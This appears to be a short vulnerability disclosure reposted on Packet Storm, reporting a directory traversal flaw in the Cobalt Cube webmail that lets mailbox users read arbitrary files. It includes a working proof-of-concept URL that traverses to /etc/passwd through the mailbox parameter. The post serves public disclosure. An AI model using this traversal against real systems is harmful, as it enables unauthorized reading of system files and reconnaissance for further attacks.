Webmail on the Cobalt Cube contains a directory traversal vulnerability which allows users with mailboxes to read any file on the system. Exploit URL's included. Verified to work against the Sun Cube III as well.
1affd95a288c842d09addf3da78a30cb53346dabcd3917f23ac63d00b2e272cfI just got a new Cobalt Cube today and I have been poking around at it
for security issues... I noticed this minor issue in the webmail system.
Your
users are not aloud to have shell access by default however if they
malform their mailbox requests they can read local files with the perms
of the webserver. If your users have shell access they will not really
be gaining anything however this could be used to remotely gather
information for a future attack.
[admin admin]$ uname -a
Linux cube.ckfr.com 2.2.16C7 #1 Fri Sep 8 15:58:03 PDT 2000 i586 unknown
[admin admin]$ cat /etc/issue
Cobalt Linux release 6.0 (Carmel)
Kernel 2.2.16C7 on an i586
http://YOURCOBALTBOX:444/base/webmail/readmsg.php?mailbox=../../../../../../../../../../../../../../etc/passwd&id=1
-KF
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed